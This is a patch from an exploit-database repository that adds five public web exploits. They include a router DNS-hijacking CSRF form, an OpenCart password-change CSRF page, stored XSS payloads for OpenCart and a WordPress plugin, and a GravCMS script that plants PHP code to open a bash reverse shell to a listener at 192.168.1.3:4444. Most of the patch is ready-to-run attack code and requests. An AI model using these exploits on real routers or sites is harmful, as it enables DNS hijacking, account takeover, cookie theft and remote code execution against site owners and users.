From 83051cc8db640458bc56d444abcf4516488d38d0 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 10 Jun 2021 05:01:53 +0000
Subject: [PATCH] DB: 2021-06-10

5 changes to exploits/shellcodes

Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
---
 exploits/hardware/webapps/49969.html | 22 +++++++++
 exploits/php/webapps/49970.html      | 73 ++++++++++++++++++++++++++++
 exploits/php/webapps/49971.txt       | 44 +++++++++++++++++
 exploits/php/webapps/49972.txt       | 19 ++++++++
 exploits/php/webapps/49973.py        | 28 +++++++++++
 files_exploits.csv                   |  5 ++
 6 files changed, 191 insertions(+)
 create mode 100644 exploits/hardware/webapps/49969.html
 create mode 100644 exploits/php/webapps/49970.html
 create mode 100644 exploits/php/webapps/49971.txt
 create mode 100644 exploits/php/webapps/49972.txt
 create mode 100755 exploits/php/webapps/49973.py

diff --git a/exploits/hardware/webapps/49969.html b/exploits/hardware/webapps/49969.html
new file mode 100644
index 000000000..98ec5258c
--- /dev/null
+++ b/exploits/hardware/webapps/49969.html
@@ -0,0 +1,22 @@
+# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
+# Date: 01/05/2021
+# Exploit Author: Rodolfo Mariano
+# Version: Firmware 1.1.2-1.1.5
+# CVE: 2021-32403
+
+# Exploit Code: 
+<html>
+    <form action="http://10.0.0.1/goform/setSysTools" method="POST">
+        <input name="module3" value="lanCfg" type="hidden">
+        <input name="lanIP" value="10.0.0.1" type="hidden">
+        <input name="lanMask" value="255.255.255.0" type="hidden">
+        <input name="dhcpEn" value="true" type="hidden">
+        <input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">
+        <input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">
+        <input name="lanDns1" value="192.168.0.30" type="hidden">
+        <input name="lanDns2" value="" type="hidden">
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49970.html b/exploits/php/webapps/49970.html
new file mode 100644
index 000000000..a87346046
--- /dev/null
+++ b/exploits/php/webapps/49970.html
@@ -0,0 +1,73 @@
+# Exploit Title		: OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
+# Date		    	: 2021/08/06
+# Exploit Author	: Mert Daş merterpreter@gmail.com
+# Software Link 	: http://www.opencart.com/index.php?route=download/download
+					: https://github.com/opencart
+# Software web  	: www.opencart.com
+# Tested on: Server : Xampp
+
+# Cross-site request forgery
+
+OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
+
+OpenCart is not using any security token to prevent it against CSRF.
+It is vulnerable to all location inside User panel.
+
+Header
+
+----------------------------------------------------------
+http://localhost/index.php?route=account/password
+
+POST /opencart/index.php?route=account/password HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
+Content-Length: 300
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/opencart/index.php?route=account/password
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="password"
+
+123asd!
+-----------------------------3890527419799841332130342675
+Content-Disposition: form-data; name="confirm"
+
+123asd!
+-----------------------------3890527419799841332130342675--
+
+
+Response
+
+HTTP/1.1 302 Found
+Date: Tue, 08 Jun 2021 16:52:59 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
+Location: http://127.0.0.1/opencart/index.php?route=account/account
+Content-Length: 0
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+----------------------------------------------------------
+
+Simple Poc to change user Password
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="password" value="1234asd!" />
+      <input type="hidden" name="confirm" value="1234asd!" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49971.txt b/exploits/php/webapps/49971.txt
new file mode 100644
index 000000000..d650c1dd9
--- /dev/null
+++ b/exploits/php/webapps/49971.txt
@@ -0,0 +1,44 @@
+# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
+# Date: 2021/08/06
+# Exploit Author: Mert Daş
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://www.opencart.com/index.php?route=cms/download
+# Version: 3.0.3.7
+# Tested on: Windows 10
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two.
+It occurs when a malicious script is injected directly into a vulnerable web application.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Subject of mail.
+
+Steps-To-Reproduce:
+1. Go to the opencart admin page.
+2. Now go to the Marketing-Mail option.
+3. Put the below payload in subject field of the Mail
+: "<script>alert(11111)</script>"
+5. Now click on send button.
+6. The XSS will be triggered.
+
+POST
+/opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 187
+Origin: http://127.0.0.1
+Connection: close
+Referer:
+http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
+Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
+
+store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
\ No newline at end of file
diff --git a/exploits/php/webapps/49972.txt b/exploits/php/webapps/49972.txt
new file mode 100644
index 000000000..5f1bcf4e3
--- /dev/null
+++ b/exploits/php/webapps/49972.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
+# Date: 09/06/2021
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
+# Software Link: https://wordpress.org/plugins/visitors-app/
+# Version: 0.3 
+# Tested on: Debian GNU/Linux 10
+# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
+
+## Description:
+# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through 
+# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
+# The 'user-agent' parameter allows attacker to escalate their privileges.
+
+## PoC
+# Replace google.com with malicious attacker page
+curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"
+
+# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
\ No newline at end of file
diff --git a/exploits/php/webapps/49973.py b/exploits/php/webapps/49973.py
new file mode 100755
index 000000000..6a47d177b
--- /dev/null
+++ b/exploits/php/webapps/49973.py
@@ -0,0 +1,28 @@
+# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
+# Original Exploit Author: Mehmet Ince 
+# Vendor Homepage: https://getgrav.org
+# Version: 1.10.7
+# Tested on: Debian 10 
+# Author: legend
+
+#/usr/bin/python3
+
+import requests
+import sys
+import re
+import base64
+target= "http://192.168.1.2"
+#Change base64 encoded value with with below command.
+#echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 
+payload=b"""/*<?php /**/
+file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');
+"""
+s = requests.Session()
+r = s.get(target+"/admin")
+adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1)
+if adminNonce != "" :
+    url = target + "/admin/tools/scheduler"
+    data = "admin-nonce="+adminNonce
+    data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
+    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+    r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a0e6960d4..238bda902 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44124,3 +44124,8 @@ id,file,description,date,author,type,platform,port
 49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php,
 49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php,
 49967,exploits/php/webapps/49967.py,"WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)",2021-06-08,"Fellipe Oliveira",webapps,php,
+49969,exploits/hardware/webapps/49969.html,"Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)",2021-06-09,"Rodolfo Mariano",webapps,hardware,
+49970,exploits/php/webapps/49970.html,"OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)",2021-06-09,"Mert Daş",webapps,php,
+49971,exploits/php/webapps/49971.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2021-06-09,"Mert Daş",webapps,php,
+49972,exploits/php/webapps/49972.txt,"WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)",2021-06-09,"Mesut Cetin",webapps,php,
+49973,exploits/php/webapps/49973.py,"GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)",2021-06-09,legend,webapps,php,